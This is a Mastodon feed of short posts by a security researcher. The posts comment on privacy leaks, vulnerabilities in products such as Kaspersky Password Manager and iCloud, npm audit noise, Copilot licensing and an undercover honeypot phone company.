More details in the article here. Grindr gave location data to third parties which was detailed enough to be associated with a priest and to out him as gay. Yet they keep claiming that this is “infeasible from a technical standpoint.” Yeah, sure…
Huge surprise! Yes, claims that data is being “anonymized” are usually merely a lame excuse. Given enough data, de-anonymization will often be possible. And that’s especially the case for highly sensitive data like movement profiles.
Their autoreply mentions the “new data protection policy.” Yes, it has been merely three years. Not nearly enough time to get accustomed with it of course.
I’ve also had my share of user complains about npm audit reporting hundreds of issues without impact to my project. I’ve also wasted time upgrading dependencies for no other reason but to silence these warnings. The issue is real, currently npm audit is clearly not helping.
Yes, Kasperky Password Manager is ridiculously ill-designed. Given what I saw there three years ago, this vulnerability is not the least surprising.
As if developers copy&pasting code without properly considering licenses wasn’t a time bomb already, we now have AI happily doing it for you. Thanks Github!
If an extension lets anyone inject CSS into Google websites, how bad could this get? This isn’t XSS but still pretty bad. From displaying scams on trusted websites to exfiltrating data: lots of possibilities.
Very nice reporting experience for a change.
Nice blog post by @LaxmanMuthiyah. All the details check out, it sounds like Apple had a massive vulnerability in their iCloud infrastructure and downplayed the severity. With passwords that are way too short, rate limiting is your only line of defense.
Verified that I didn’t make any mistakes in the formula, finally searched for an existing solution. Turned out that the hammer I had didn’t match the nail, and B-splines were the way to go. This just worked.
To my defense: I didn’t have internet when I was thinking this up. 🙈
Wonderful. In this case, the manipulated device was merely used to deliver a malicious application. The badly written letter also triggered alarms. And now imagine the same thing done properly, without anything to tip off users.
@xerz I remember that undercover agents need to commit crime without being charged with criminal offenses. Otherwise it would be trivial to blow their cover: anyone unwilling to commit a crime is an agent. So there must be some law covering this, and it probably applies here as well…
@xerz That’s what I thought as well. Then again, they didn’t know that they were working for a honeypot company. They thought that they were doing real crime. 🤷♂️
I wonder however: how do the people who did know the scheme go free of charges? Investigation or not, they willingly facilitated crimes. How far could they go without being charged with anything?
Yes, it’s easy to get all paranoid here. The big question is whether the paranoia is justified, and I don’t expect the answer to turn up any time soon. All we get is a suspicion that there might be more things going on than busting drug cartels.
Wladimir Palant, software developer and security researcher, browser extensions expert. He/him
Other Mastodon account for non-technical topics: https://social.tchncs.de/@WPalant
A Mastodon instance for info/cyber security-minded people.